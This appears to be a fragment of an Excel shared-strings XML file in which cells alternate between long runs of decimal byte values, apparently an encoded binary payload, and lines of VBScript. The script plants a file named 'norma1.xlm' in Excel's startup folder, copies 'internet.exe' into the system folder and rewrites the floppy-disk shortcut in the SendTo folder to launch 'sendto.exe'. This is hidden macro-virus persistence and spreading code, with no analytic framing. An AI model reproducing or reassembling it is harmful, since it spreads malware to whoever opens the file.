    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
